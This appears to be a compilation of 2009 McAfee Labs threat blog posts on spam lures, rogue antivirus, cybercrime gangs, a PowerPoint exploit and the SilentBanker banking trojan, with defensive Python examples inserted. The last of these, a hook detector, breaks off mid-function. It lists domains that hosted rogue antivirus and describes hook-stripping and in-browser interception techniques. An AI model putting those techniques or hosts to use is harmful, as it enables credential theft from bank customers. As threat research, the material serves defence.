The McColo closure as a single event remains significant, but when you compare it with the huge increases in volume that we have seen since then–driven by increased spoofs against social media sites through viruses like Koobface, and by spam continuing to be a major factor in the successes of Rustock and Cutwail–the decrease now reflects only a momentary blip on the radar.

Nonetheless, you should expect to see more of these types of takedowns as security researchers and research organizations continue to get involved, but you should also expect the overall effect of those shutdowns to be temporary. McColo has taught botnet owners a lesson. As a result botnet control centers have become more distributed, spanning many networks in many countries. Today taking down a big hosting provider would prove only a minor inconvenience as opposed to a major victory for security forces.

Rogue Anti-Spyware Targets Sesame Street’s Big Bird

The idea of malware distributors abusing Google Trends is not new. The bad guys have once again demonstrated that they, too, can take advantage of Google Trends. This time their target is Big Bird’s birthday.

Big Bird

It’s not new that the Google logo includes Big Bird; it does so on special occasions. The Google logo clearly shows Today’s Hot Trends, and that’s a target for malware writers.

This year is the fortieth anniversary of Sesame Street, and the bad guys have begun their attack. Searching for keywords such as Big Bird’s birthday and Big Bird on Google displays pages with compromised sites.

Watch the video below, which shows how rogue anti-spyware attacks a system.

The video shows that the malware is literally pushed onto the system regardless of what the user does. In the past we have seen malware injected into a compromised site through exploits and iframes. Today, malware often attacks only from a search-results page. In certain attacks, if a user directly accesses a compromised site, then there’s no redirection to a payload and no infection.

Users have no idea what they will get by clicking on search results, which now are like a virtual minefield; you never know what will happen next. McAfee strives to protect users from such attacks through its free SiteAdvisor technology. It warns users with green, yellow, and red alerts next to each search result. You can minimize your risk of attack by using SiteAdvisor and paying attention to what you are clicking on.

NOW LIVE! McAfee Online Support Community

The McAfee Online Support Community gives you a way to interact with other McAfee business users to ask questions and share best practices. Additionally, you’ll be able to talk with McAfee professionals about McAfee products, security awareness issues, and emerging trends—plus give us feedback on product and service enhancements.

The new community will have main areas for Business users, Home/Home Office users, Security Awareness, and Community Help. Through discussions, blogs, wikis, profiles, polls, and special interest groups, you’ll find the McAfee Online Support Community a great place to be.

Go to http://community.mcafee.com to explore, join, and participate today!

Peer-to-Peer Goes Both Ways

We all know the dangers of peer-to-peer (P2P) networks and their role in distributing malware. Most people who deal with this problem work tirelessly to limit the impact of these potential threat points by (among other things) adding anti-virus, firewalling, watching network flows for P2P traffic, and usually outright banning of P2P applications.

They may, however, be looking the wrong way. The bits and bytes flow in two directions–in and out. Data leakage from a network is just as serious as bringing in malware-laden MP3s, cracked software, or MOV files.

You may be thinking to yourself, “Yeah, but leaking information is for disgruntled employees, or those looking to profit from foreign spies being ‘in the market’ for specific secret data. I don’t employ people who would do that.”

For argument’s sake, let’s say that you do in fact employ workers who are of the highest moral character, you’ve firewalled the outside, banned the applications, monitored the network traffic, and updated your anti-virus signatures.

So what happens when one of your employees is out sick–yet a big presentation is still due on Friday? Any chance he or she may take work home to finish when “there just aren’t enough hours in the day”?

The vector does not even need to be company-owned. If an employee is emailed the presentation, or copies it onto a USB device, this is the time that the data is the most vulnerable–it’s out of your control. Most home users do not implement the same security practices that a company does. If that data is moved into a directory reachable by the P2P application, it is reachable by potentially millions of users on the same P2P network. Do you think a file called OurSecretFormula.doc would look enticing?

For those ever-present naysayers, here is a recent example of this occurring.

So the moral of this story is not that this is new or ground breaking–it certainly isn’t. It’s just a reminder to look both ways.

Rogue AV Haunts Halloween

Festive search words are a favorite with scammers as a lure to their offerings, as my colleague David Marcus recently warned us about Halloween-themed threats.

In recent research, we have found that search results for “scary halloween pumpkin designs” could lead users to a hijacked web page that hosts rogue security products.

Results for Halloween related keywords

Redirected page that has the link to malware

Upon clicking the hyperlink, the user sees a website hosted on xxx.allxxxxxshxxx.com. The site presents a fake “Windows Security Alert” window that is identical to the scam reported by McAfee Labs’ Avelino Rico Jr. in his recent blog. The “alert” warns visitors of fake infections and requires the victims to download a tool to remove them.

FakeAlert window

What happens after installing this tool is the same as many other rogue AV or FakeAlert stories we’ve reported. This malware is now detected as FakeAlert-JW Trojan.

Watch out for this and other malware during Halloween season, and keep your security products updated.

Trick or Treat With Spam and Malicious Screensavers

I have previously blogged that some of the most common techniques scammers and cybercriminals use are news events and holidays. Balloon Boy and the Windows 7 Launch are good examples. My colleague Sam Masiello’s blog on President Barack Obama’s Nobel Prize is another excellent example. With Halloween approaching rapidly, the tricks are already knocking on your inbox and at your browser’s window.

As usual, although the lure differs depending upon the news or event, these tricks lead to the usual suspects–fake products and pharmacy spam. Just think of it: Would you like some candy or Viagra for Halloween?

Halloween Viaga

Here’s another:

Holiday Scam Products

And our favorite with a holiday spin:

Canadian Halloween Pharmacy

Here are a few message subjects to fear:

Approved meds available without recipe!
A HORRIFYING HALLOWEEN SALE!
ONLY TILL 31OCTOBER HALLOWEEN SALE: 40% OFF ALL OUR SOFT USE THIS DISCOUNT CODE: HALL-6666
Biggest deal this halloween
Low prices for big enlargement
Halloween discount
Annual Halloween Sale

While searching for “Halloween screensavers,” I ran across more than a few questionable websites. The following was the fifth entry on the first Google results page! No worries, we already had it flagged through our SiteAdvisor technology:

Malicious Halloween Screensavers

Keep your security updated and search safely this week!

Let’s Play ‘Find the Errors’

I’m writing this blog to demonstrate how the bad guys are getting better each day–or not, depending on your point of view.

Once again our topic is Brazilian malware authors. Yes, the dumb ones I keep running up against.

One of the recent versions of the PWS-Banker Trojan being distributed via spam has an interesting feature. First, let’s recall how this malware usually spreads:

  • Spam with the common “click here to see photos/videos/statement/etc…” links
  • IM (MSN Messenger, Skype, etc.)
  • This version of PWS-Banker, besides grabbing passwords and screenshots, also downloads Microsoft MSN Messenger. Or an app that at least looks like Messenger.

When you enter your username and password and click enter, the app exits. But in the background it messages all your contacts on your behalf, sending nice notes with links.

Now, let’s play The Seven Errors Game. Below are two MSN Messenger login screens. (One is in Portuguese and the other is in English, but that is not one of the errors.)

fake and real

Unfortunately I am not really being fair with you, because only one of the seven errors can be seen visually. The other six are found only by behavioral analysis.

Here are the answers, starting from the top and working downward.

spot_the_dumbs

1) The windows are different, and you can see the minimize/maximize/close buttons are different
2) The help icon is the same, but when you click on it, no option is clickable
3) The drop-down box for the login name doesn’t work
4) The status drop-down box doesn’t work
5,6,7) The check boxes don’t work

Next time something unexpected pops up on your screen, don’t enter your data right away. Check and recheck before you believe it’s real.

Balloon Boy Spam Drifts Through Town

It’s bad enough that we are subjected to apparently fake child-peril balloon shenanigans in the news–and I guess this was only to be expected–but it seems that spammers and scammers have latched onto Balloon Boy as a lure to sell pharmaceuticals. Given the amount of news the original story of Falcon Heene and the runaway balloon produced and the subsequent news around the possible scam, it was too attractive a lure to be ignored.

As usual, though, despite the novelty of the news event itself, the spams lead to the same types of stuff:

Subject: Drama With Balloon (Exclusive)

All leading to the same fake “Canadian” pharmacy sites. (The Chinese registrant info for this one was only a few days old!):

Bogus Canadian Pharmacy Site

Common subjects to beware of include:

Little boy trapped in balloon
Boy-balloon-madness
balloon kid’s full story
Balloon boy died
Drama with balloon(exclusive)

Be careful what you click, and mind the news. It is often the lure the spammers look for.

My thanks to colleagues Adam Wosotowsky and Sam Masiello for the samples.

Windows 7 Beaten to the Punch by Spam

The release of Microsoft’s next major operating system, Windows 7, is at hand. It’s timely to remind everyone that we have seen Windows 7 spam for a few months. Anything on this scale from Microsoft is too big a lure for spammers and cybercriminals to ignore. (I would be stunned if they didn’t take advantage.)

We’ve seen subjects that include:

Microsoft Windows 7 special offers
Windows 7 SP 2
Windows 7 FAQ on release
Today’s Special Gateway Laptop + NEW Windows 7 & More Electronics Deals
Windows7 ultimate 86% off
Windows7 ultimate 57% off

We at McAfee Labs have noticed these throughout both September and October–with spikes as high as 1.88 percent of total spam. That might sound like a small number, but when you consider that daily spam volumes can reach 160 billion messages, it is not insignificant.

As always, stay aware of the trends the scams and spammers use to lure you in. Be safe and watch what you click!

I thank my colleague Adam Wosotowsky for the background data!

Cybercrime Organizations Turn to ‘Mafia-Style’ Structure

In Las Vegas during this month’s McAfee FOCUS 09 conference, I listened to various speakers in the Threats and Trends track. They explained how cybercrime is now managed by individuals driving their groups according to highly professional business models.

One of the most interesting talks was given by my colleague Dirk Kolberg, who presented on Innovative Marketing, a Ukrainian scareware company the Federal Trade Commission accused of spreading some massive “scareware” schemes–alarming messages falsely claimed that scans had detected viruses, spyware, and illegal pornography on consumers’ computers. The U.S. District Court for the District of Maryland approved the FTC’s request to call a halt to the company’s activities and freeze the assets of those behind the scams.

Explaining that Innovative has more than 600 employees in real offices, subsidiaries in various countries such as India, Poland, Canada, the United States, and Argentina, complete with customer call centers, Dirk said the company received approximately 4.5 million order IDs in 11 months or, in other words, US$180 million (at $40 each). Technical support, a professional website, and LinkedIn profiles for the company and its staff provided what appears to be a legitimate front. Following its legal troubles, it is now a defunct company; yet many employees have joined a new entity that has the same production targets.

The same day, my colleague Dmitri Alperovitch gave an overview of the Eastern European cybercrime landscape. Like Dirk, Dmitri demonstrated the high level of organization within the cybercrime industry. The first example came from Romania, where the Bogdan Païu carding gang operated. Members were caught in the act and arrested in 2006 after they emptied the accounts of several hundred citizens of Brazil, Spain, Italy, and the United States.

Well organized and equipped with sophisticated cloning devices, they received the personal data from Russian accomplices. Counterfeiters spent the money diverted from ATMs on striptease entertainment clubs, luxury cars, luxury hotel accommodation, food, and fine drinks.

In the second part of his talk, Dmitri presented a timeline of events in the Eastern European carding underground:

He discussed CarderPlanet and its hierarchical structure, set up like a mafia (the source for the following image: NICSA-FBI-SSA, Michael J. McKeown).

CarderPlanet was shut down in 2004 and the FTC complaint for the injunction against IMU dates from December 2008, but cybercrime gangs will always rise from their ashes.

Around Kyiv, the making of fake antivirus software still flourishes. The latest statistics on rogue antivirus–presented by Craig Schmugar and Anthony Bettini in their session–are unequivocal.

The latest news on carding and phishing demonstrates the size and the worldwide organization of today’s cybercrime gangs.

  • In France, about 70 individuals were recently indicted. They were “mules” who, via Western Union, sent the money they embezzled to Ukraine and Russia.
  • In France, a gang of Slovakian gangsters from Britain was under investigation after bank cards were used to take more than $480,000 from cash machines in northern France. Up to 50 Eastern Europeans descended on Calais from Dover early on September 11 before emptying cash points across the region. Thirty-four were arrested, all using Barclays Bank cards. According to the police in Lille, a “Mafia-style” mastermind had used dozens of mules to empty machines at a range of banks.
  • This month in the United States, the FBI announced the results of Operation Phish Phry. After a two-year investigation, more than 50 individuals in California, Nevada, and North Carolina and nearly 50 Egyptian citizens have been charged with crimes including computer fraud, conspiracy to commit bank fraud, money laundering, and aggravated identity theft. The gang victimized hundreds and possibly thousands of account holders by stealing their financial information and using it to transfer about $1.5 million to bogus accounts they controlled. Here, too, the group was very organized, as demonstrated by a chart created with i2 Analyst’s Notebook by Gary Warner.

All these examples support the position that Dave DeWalt discussed during Wednesday’s general session: “The bad guys are getting organized. This is not the hacker in your basement. We’re talking about organized crime, organized terrorism, and organized warfare,” DeWalt said. Identity theft, phishing, or fake alerts go through the Net. Faced with these threats, large organizations deploy solutions from multiple vendors because the truth is that no single vendor can meet all of their security and compliance needs. But today’s security threats and economic challenges demand that products from multiple vendors interoperate to provide better protection, reduce operational costs, and streamline the compliance lifecycle. This is why at FOCUS 09 DeWalt also reaffirmed his support of the McAfee Security Innovation Alliance (SIA). He described it as the “NATO” of security software, a call for a universal architecture for security standards, and confirmed that McAfee is focused on improving partnerships and establishing an extended, broader community through this innovative technology-partnering program.

    ASCII Art Spam Strikes Back

    Spammers are always looking for techniques that beat spam filters. We have seen many of them: obfuscating words, embedding text in images, spoofing URLs, abusing social networking sites, and plenty of other tricks for keeping spam from getting caught.

    One of these techniques is ASCII art, the practice of representing an image using text characters. Such representations first appeared decades ago, to overcome the limitations of computers that could not display graphics.

    Example:

    ______    _____   ______    _       _____    _____     ___
    | ___ \  |  ___|  | ___ \  | |     |_   _|  /  __ \   / _ \
    | |_/ /  | |__    | |_/ /  | |       | |    | /  \/  / /_\ \
    |    /   |  __|   |  __/   | |       | |    | |      |  _  |
    | |\ \   | |___   | |      | |____  _| |_   | \__/\  | | | |
    \_| \_|  \____/   \_|      \_____/  \___/    \____/  \_| |_/

    The trick is that each line on its own is just a run of underscores, pipes and slashes that does not resemble any part of the word “replica,” so a filter that tokenizes the message line by line never sees the word. Taken as a whole, though, our eyes read it as a word. Spammers exploit this to slip past keyword-based filters and still deliver their message.

    Not only words but also URLs can be rendered this way, so that a blacklisted domain never appears in the message as text.

    ASCII art is not limited to punctuation strokes. The glyphs can be drawn from digits, letters, or a mix of both, which makes things even harder for filters that look for runs of symbol characters:

    dP""b8  88     db     88     88  dP"Y8
    dP      88    dPYb    88     88 `bo
    Yb      88   dP__Yb   88     88   `Y8b
     YboodP 88  dP""""Yb  88ood8 88  8bodP'

    ASCII art spam example

    In the email above the spammer advertises a pharmacy product without ever using the product’s name as text, yet still conveys the message.
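    Both samples above share a property a filter can use: each line is a long run of characters drawn from a tiny alphabet, and the rendered letters are separated by columns that are blank in every row. The script below is an added example (not code from McAfee or from the original post) that finds such blocks in a message body, splits them into glyphs by blank columns, and fingerprints each glyph so that the same rendering of a letter can be matched across campaigns regardless of the words around it. The two art blocks are copied from the samples above; the surrounding message and the thresholds in `art_like` are constructed assumptions.

```python
import hashlib

# The two ASCII-art blocks from the spam samples above, embedded as test input
# (page indentation stripped, column layout kept exactly).
REPLICA_ART = [
    "______    _____   ______    _       _____    _____     ___",
    "| ___ \\  |  ___|  | ___ \\  | |     |_   _|  /  __ \\   / _ \\",
    "| |_/ /  | |__    | |_/ /  | |       | |    | /  \\/  / /_\\ \\",
    "|    /   |  __|   |  __/   | |       | |    | |      |  _  |",
    "| |\\ \\   | |___   | |      | |____  _| |_   | \\__/\\  | | | |",
    "\\_| \\_|  \\____/   \\_|      \\_____/  \\___/    \\____/  \\_| |_/",
]
CIALIS_ART = [
    'dP""b8  88     db     88     88  dP"Y8',
    'dP      88    dPYb    88     88 `bo',
    'Yb      88   dP__Yb   88     88   `Y8b',
    " YboodP 88  dP\"\"\"\"Yb  88ood8 88  8bodP'",
]

# Constructed message body: prose around the two art blocks.
SAMPLE_MAIL = "\n".join([
    "Subject: your order",
    "",
    "Hi, we have an offer for you today, see below:",
    "",
    *REPLICA_ART,
    "",
    "Best watches, low prices, fast shipping worldwide.",
    "",
    *CIALIS_ART,
    "",
    "Reply to this message to order.",
])


def art_like(line: str, min_len: int = 12) -> bool:
    """Heuristic (thresholds are assumptions tuned on the two samples): art rows
    are long, dominated by spaces and symbols, and use a small alphabet."""
    if len(line) < min_len:
        return False
    symbol_ratio = sum(not ch.isalnum() for ch in line) / len(line)
    return symbol_ratio >= 0.3 and len(set(line)) <= 14


def find_art_blocks(text: str, min_lines: int = 3):
    """Return runs of at least min_lines consecutive art-like rows."""
    blocks, run = [], []
    for line in text.splitlines() + [""]:       # sentinel flushes the last run
        if art_like(line):
            run.append(line)
        else:
            if len(run) >= min_lines:
                blocks.append(run)
            run = []
    return blocks


def segment_glyphs(block):
    """Split a block into glyphs: a column that is blank in every row separates
    one rendered letter from the next."""
    width = max(len(row) for row in block)
    rows = [row.ljust(width) for row in block]
    blank = [all(r[c] == " " for r in rows) for c in range(width)]
    glyphs, start = [], None
    for c in range(width + 1):
        if c < width and not blank[c]:
            if start is None:
                start = c
        elif start is not None:
            glyphs.append([r[start:c] for r in rows])
            start = None
    return glyphs


def glyph_fingerprint(glyph) -> str:
    """Hash the glyph bitmap (trailing spaces and blank top/bottom rows trimmed)."""
    rows = [r.rstrip() for r in glyph]
    while rows and not rows[0].strip():
        rows.pop(0)
    while rows and not rows[-1].strip():
        rows.pop()
    return hashlib.sha1("\n".join(rows).encode()).hexdigest()


def glyph_fingerprints(block):
    return [glyph_fingerprint(g) for g in segment_glyphs(block)]


def analyse(text: str):
    """Summarise each art block as (row count, glyph count, fingerprints)."""
    return [(len(b), len(segment_glyphs(b)), glyph_fingerprints(b))
            for b in find_art_blocks(text)]


if __name__ == "__main__":
    for rows, glyphs, fps in analyse(SAMPLE_MAIL):
        print(f"{rows} rows, {glyphs} glyphs, first fingerprint {fps[0][:12]}")
```

    On the sample the first block yields seven glyphs (R E P L I C A) and the second six (C I A L I S); the two “I” glyphs in the second block hash to the same value, which is what lets a filter match a known rendering of a word even when the spammer changes the letters around it. The heuristic will also fire on signatures made of dashes or box-drawing characters, so treat a hit as a feature for a scoring engine rather than a verdict on its own.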

    We saw this spam technique some time back, but it had died off. Recently, however, we have seen an increase. McAfee customers are protected from this type of spamming technique.

    McAfee Labs and the International Spy Museum

    Surrounded by a network of neon lights across the ceiling and walls of computer screens lit with grave headlines about our country’s digital dependence (drinking water, sewer systems, banks, government systems, all vulnerable to an electrical grid outage), I introduced my wife and my sixteen-year-old daughter to our latest McAfee endeavor: McAfee is a contributor to the new International Spy Museum exhibit “Weapons of Mass Disruption.”

    Yes, you read that correctly. Your humble narrator is part of a museum exhibit.

    Nestled on the corner of 8th and F Streets in Washington, D.C., the International Spy Museum has become a must-see in our nation’s capital. It speaks to our country’s tales of espionage and the ultimate currency, intelligence. Never has a place been better suited to educate its visitors about the cybersecurity threats facing our government, our businesses, and you and me.

    As former national intelligence director Admiral Michael McConnell mentioned during the exhibit’s opening event, the Internet has created an unprecedented level of vulnerability.

    These threats, which could bowl you over in their magnitude and frequency, are constantly evolving, morphing into ever-changing but equally lethal pieces of malware, as diverse and fluid as Web 2.0 itself. In the middle of all that sits our office, littered with Red Bull and Twinkies, where I and many other McAfee Labs researchers build an understanding of the dark side of cyberspace. You know the saying: keep your friends close but your enemies closer. It is this insight that yields information on breaking threats and a more holistic understanding of the black-hatted enemy.

    So consider again the computer wall’s grave headlines in the exhibit: “The Pentagon’s IT system is probed 360 million times a day. Twitter crashed as a result of a denial of service attack against a Georgian proponent. Is our air traffic control system protected?”

    The exhibit shouts the theme that we as an industry live with, and that I shared in my interview for the exhibit: the threat is real. Even my daughter got a kick out of it.

    McAfee Labs Releases October Spam Report

    Cybercriminals are taking advantage of American concerns about healthcare by flooding the Internet with spam. According to our October Spam Report, 70 percent of global spam is now “Canadian” pharmacy spam, which takes advantage of fears of swine flu and the rising costs of Medicare and pharmaceuticals.

    Spammers generate more than 150 billion spam messages daily; that’s enough to send everyone in the world more than 30 emails every day (including people without computers). Nearly 19 out of every 20 emails are spam, and cybercriminals are growing more sophisticated with their attacks. No brands seem to be safe, and this month’s report analyzes how spammers are abusing the brands of Monopoly, The Hollywood Reporter, and even the Jewish organization Chabad to distribute malware.

    The report can be downloaded here.

    Malware and standards – is it possible?

    I am excited to be involved in a joint industry effort to define an XML format that allows the rapid exchange of malware information between security companies. The work was done by the “Malware Working Group,” operating as part of the “Industry Connections Security Group” (ICSG) under the umbrella of the IEEE. A web search for “IEEE ICSG” should bring up the group’s page at the top of the results.

    About 20 people from multiple security companies contributed to the proposal for the standard, and I am very pleased with the result. It is a simple, flexible and powerful format that is already being used by four anti-malware companies to transmit meta-data about the prevalence of malware in the field. Wider adoption of this meta-data sharing will replace the sample swapping of the past with a real-time exchange of threat intelligence. Communicating the relationships between malware samples, domains and IP addresses opens endless possibilities for improving the security of all Internet users.

    For example, it will let us describe the whole history of the domains and IPs used by a specific malware-writing group: which malware they hosted, and even how that malware got installed onto users’ computers. All of this can be expressed unambiguously, in a form suited to rapid automated analysis. In a word: powerful.

    But there are huge benefits even in trivial transmitting of the simplest malware prevalence data:

    • If you are an anti-malware vendor you will be able to prioritize samples in your research queues.
    • If you are a testing organization you will be able to create more relevant test sets (for example, downgrade rare and old samples).
    • If you are an administrator you can submit consolidated field reports to anti-malware vendors and help make the Internet a safer place.

    Here is what a portion of the XML meta-data looks like:

    XML meta-data

    If you are interested, the complete XML schema is available here, and if you want to get involved, please get in touch with your current point of contact at McAfee Labs.
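    To make the three use cases above concrete, here is an added example (not the IEEE ICSG schema and not McAfee code) that consumes a feed in a simplified, hypothetical XML format carrying the kinds of facts the text describes: sample hashes, field prevalence, hosting domains, resolved IPs and install vector. From it the script derives a prevalence-ordered research queue and the domain/IP relationships between samples. Hashes, domains and addresses are made up (documentation IP ranges), and the element names are assumptions.

```python
import xml.etree.ElementTree as ET   # partner feeds are untrusted input: use defusedxml in production
from collections import defaultdict

# Constructed feed in a hypothetical format; NOT the IEEE ICSG XML.
SAMPLE_FEED = """\
<feed producer="vendor-a" generated="2009-10-01T12:00:00Z">
  <sample md5="a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1" family="Backdoor.Example.a">
    <prevalence count="1250" first_seen="2009-09-12" last_seen="2009-09-30"/>
    <hosted_on domain="dl.payload.example.net"/>
    <hosted_on domain="cdn.mirror.example.org"/>
    <installed_via vector="drive-by"/>
  </sample>
  <sample md5="b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2" family="Backdoor.Example.b">
    <prevalence count="3" first_seen="2009-09-29" last_seen="2009-09-29"/>
    <hosted_on domain="dl.payload.example.net"/>
    <installed_via vector="email-attachment"/>
  </sample>
  <sample md5="c3c3c3c3c3c3c3c3c3c3c3c3c3c3c3c3" family="FakeAlert.Example">
    <prevalence count="40210" first_seen="2009-08-01" last_seen="2009-09-30"/>
    <hosted_on domain="scanner.example.com"/>
    <installed_via vector="social-engineering"/>
  </sample>
  <domain name="dl.payload.example.net"><resolves_to ip="198.51.100.7"/></domain>
  <domain name="cdn.mirror.example.org"><resolves_to ip="198.51.100.7"/></domain>
  <domain name="scanner.example.com"><resolves_to ip="203.0.113.9"/></domain>
</feed>
"""


def load_feed(xml_text: str):
    """Parse the feed into (samples by md5, domain -> [ip]) dictionaries."""
    root = ET.fromstring(xml_text)
    samples = {}
    for s in root.findall("sample"):
        p = s.find("prevalence")
        samples[s.get("md5")] = {
            "family": s.get("family"),
            "count": int(p.get("count")) if p is not None else 0,
            "first_seen": p.get("first_seen") if p is not None else "",
            "domains": [h.get("domain") for h in s.findall("hosted_on")],
            "vectors": [v.get("vector") for v in s.findall("installed_via")],
        }
    resolutions = {d.get("name"): [r.get("ip") for r in d.findall("resolves_to")]
                   for d in root.findall("domain")}
    return samples, resolutions


def research_queue(samples):
    """Vendor use case: most widespread samples first, oldest first on ties."""
    return sorted(samples, key=lambda h: (-samples[h]["count"], samples[h]["first_seen"]))


def hosting_graph(samples, resolutions):
    """ip -> {domain -> set of sample hashes}: links every sample that shares a host or an address."""
    by_domain = defaultdict(set)
    for h, s in samples.items():
        for d in s["domains"]:
            by_domain[d].add(h)
    graph = defaultdict(dict)
    for d, ips in resolutions.items():
        for ip in ips:
            graph[ip][d] = by_domain.get(d, set())
    return dict(graph)


def samples_on_ip(samples, resolutions, ip):
    """All sample hashes hosted on any domain that resolved to ip."""
    hashes = set()
    for domain_samples in hosting_graph(samples, resolutions).get(ip, {}).values():
        hashes |= domain_samples
    return hashes


if __name__ == "__main__":
    samples, res = load_feed(SAMPLE_FEED)
    print("queue:", research_queue(samples))
    print("shared infrastructure:", samples_on_ip(samples, res, "198.51.100.7"))
```

    The rarely seen backdoor variant (three reports) would normally sit at the bottom of a queue, but the graph links it to the same address as the widespread one, which is the kind of relationship a plain sample exchange never carries.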

    Rebranded Rogue Anti-Virus Strikes Again

    Recently, we analysed samples of a new fake anti-virus program that brands itself as Alpha Antivirus. This program uses the following filenames: alphaav.exe and msnaoladdon.dll.

    Alpha Antivirus is a new FakeAlert variant that evolved from the Personal Antivirus family of rogue anti-virus software. Like much FakeAlert malware, Alpha Antivirus promotes itself through pop-up web pages hosted on malicious websites. These pages mimic a Windows Explorer folder and a Windows Security Alert dialog, and perform a free but fake online scan of the visitor’s system.

    online scanning

    The following domains were known to host the fake online-scanning web pages and the main executable of Alpha Antivirus:

    • mycompinfo17.com
    • internetantivirusproscanner.com
    • mycomputeronlinescan11.com
    • internetsecurityscan.com
    • mycompscanner07.com
    • mycompscanner42.com
    • internetantivirusproscan.com
    • windowsdefenderupdate5.com
    • securitybugfixupdate6.com

    The page then prompts the user to install Alpha Antivirus. Once executed, the program runs a fake scan and reports multiple infections:

    Alpha AV fake scan results (screenshots)

    It also displays misleading pop-up warnings on the Windows taskbar.

    Alpha AV taskbar warnings (screenshots)

    This variant drops a copy of itself as %ProgramFiles%\AlphaAV\AlphaAV.exe, drops an msnaoladdon.dll component into the Windows System folder, and registers that DLL as a browser helper object (BHO) so that Internet Explorer loads it on every start.

    (%ProgramFiles% refers to the Programs folder, for example, C:\Program Files.)

    AlphaAV.exe is detected as FakeAlert-DI, while msnaoladdon.dll is detected as FakeAlert-EQ.

    We frequently see abrupt changes in the branding, filenames and GUIs used by the same fake anti-virus programs. As more security vendors and researchers publish their findings about a rogue anti-virus program, its authors repackage the “product” under a new brand name and new filenames, and apply more obfuscation and encryption to the files, in an attempt to avoid being recognised by users and, in some cases, to evade detection by security vendors.

    Some known brand name and filename changes:

    1. From pav.exe + winexplorer.dll to personalav.exe + msxmlm.dll (Personal Antivirus), and again to alphaav.exe + msnaoladdon.dll (Alpha Antivirus)

    2. From frmwrk32.exe to winupdate.exe (Antivirus XP/Pro)

    3. From pcdef.exe + mousehook.dll + ntdll64.dll (WinPC Defender) to winav.exe + ieocx.dll + iehostcx32.dll (WinPC Antivirus)

    4. From Spyware Protect 2009 to Antivirus System Pro

    As a gentle reminder to all users: Avoid visiting untrusted websites, install anti-malware products only from trusted and legitimate sources, and update the DATs regularly.

    Blast from the past: Fresh wave of targeted attacks using PowerPoint

    Using social engineering to grab a recipient’s attention and deliver malware is nothing new. The current trend is to ride a breaking celebrity story, disaster or other high-profile news event. The lure may arrive as email or as poisoned search-engine results that lead to malware. In the past we have seen innumerable incidents, such as the death of Michael Jackson or the assassination of Benazir Bhutto, used as a platform for spreading malware. Lately we have observed an increase in OLE files being used in targeted attacks against various high-profile users.

    The lure claims to contain information on the Pakistani Air Force and arrives by email as a PowerPoint attachment. When an unsuspecting user with a vulnerable version of PowerPoint opens the document, the vulnerability is triggered and the malicious payload is executed.

    The vulnerability lies in PowerPoint’s handling of a malformed record, which can be exploited to execute arbitrary code. The shellcode uses the Process Environment Block (PEB) technique to find the base address of kernel32.dll (walking the loader’s module list from the PEB rather than relying on a hard-coded address), as shown in the figure below.

    Upon executing the file in a vulnerable version of PowerPoint, the shellcode decrypts itself and executes the malicious binary.

    The malicious PPT file exploits an older vulnerability, patched by Microsoft in bulletin MS06-028. The attack is detected by the current DATs as Exploit-PPT.h, and the dropped executable as BackDoor-EFB.

    Inside the Password-Stealing Business

    Today Avert Labs has published a new research paper, “Inside the Password-Stealing Business: the Who and How of Identity Theft.” With so many financial transactions occurring online today, stealing passwords to banks and other accounts is an irresistible attraction for cybercriminals. Thieves around the world use Trojans and other malware to grab user credentials, which they can resell to their crooked clientele while supporting their own illegal businesses.

    Our report uncovers technical details on the capabilities, level of sophistication, and inner workings of the most infamous contemporary password-stealing malware families such as Zbot, Sinowal, and Steam Stealer. We also discuss the prevalence of such malware, distribution channels, how criminals keep up with the changes banks make to keep transactions secure, and how they exploit today’s economic climate. Offering illegal “work at home” opportunities to desperate job seekers is one way criminals lure the unsuspecting into furthering their illegal activities.

    You’ll find our report here in English and eight more languages.

    Want to peek inside another one of these infamous password thieves? Let’s have a look at SilentBanker.

    Our story starts with browser helper objects (BHOs), which are plug-ins for Internet Explorer. BHOs let developers extend the browser’s functionality without access to the browser’s source code. That doesn’t sound too bad: users aren’t forced to wait for the browser’s developers to implement new features. Even if you’re not a developer, it seems useful to be able to download any extension you want, whether to customize the user interface or to read PDF documents directly in the browser, doesn’t it? Well, yes and no. The answer depends on the trustworthiness of the BHO’s author, of the server you download it from, and of the DNS server that pointed you there. Unfortunately, not all BHOs are safe applications; the bad guys are always looking for ways to turn originally useful features into a way to deploy their malware and hunt for usable information such as credentials. SilentBanker is one of those nasty password stealers, and it comes in the form of a BHO.

    This is one “helper” you don’t want on your side. Once installed and automatically loaded by the browser, SilentBanker can intercept all communication between your browser and the Internet. The malware is highly configurable and targets online banking users. SilentBanker will not only recognize and monitor online banking activity but may also modify HTML pages to include additional code or to change a transfer’s details. The data thief acts as a man in the middle inside the browser, inspecting and modifying data before it is encrypted and sent to the server, and after it is received from the server and decrypted. Still think you’re secure with SSL? Not with this freeloader sitting above the encryption layer: it sees the plaintext on both sides.

    Silentbanker BHO

    The screenshot above shows a pseudocode representation of SilentBanker’s malicious core. The code is responsible for detouring relevant operating system functions to its own malicious routines. It also effectively neutralizes security applications, such as host intrusion prevention systems, that rely on the same detouring technique: before installing its own detours, the malware disables any previously installed ones by reading the original code of the Windows library from the hard disk (“read_whole_file”) and mapping it back over the process’s memory (“remove_API_hooks”). Any security product whose hooks lived in that code is rendered ineffective.
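    The disk-versus-memory comparison SilentBanker performs to strip other hooks is the same comparison a defender can run to find SilentBanker’s own. The following added example (not McAfee’s code and not taken from the malware) shows the core of it on a constructed 96-byte stand-in for a DLL’s code section: the on-disk bytes of each exported function’s prologue are compared with the in-memory bytes, detours are classified as `jmp rel32` or `push imm32; ret`, their targets are resolved, and the original prologue is written back. The export names, offsets and an image base of zero are assumptions; on a real system the two images come from the mapped file and from ReadProcessMemory, and only the prologue bytes (never IAT thunks or relocated words) are compared.

```python
import struct

# Constructed stand-in for a code section. Offsets are RVAs; image base is
# assumed to be 0 so push/ret targets equal RVAs. Names are illustrative only.
EXPORTS = {"CreateFileW": 0x10, "HttpSendRequestW": 0x20, "InternetReadFile": 0x30}

_PROLOGUE = bytes.fromhex("8bff558bec")   # mov edi,edi ; push ebp ; mov ebp,esp
_BODY = bytes.fromhex("83ec10")           # sub esp,0x10


def _build_disk_image() -> bytes:
    img = bytearray(0x60)
    for rva in EXPORTS.values():
        img[rva:rva + 8] = _PROLOGUE + _BODY
    return bytes(img)


DISK = _build_disk_image()


def _build_hooked_image() -> bytes:
    """DISK with two exports detoured the way inline-hooking malware and HIPS do it."""
    img = bytearray(DISK)
    img[0x10:0x15] = b"\xe9" + struct.pack("<i", 0x50 - (0x10 + 5))   # jmp rel32 -> stub at 0x50
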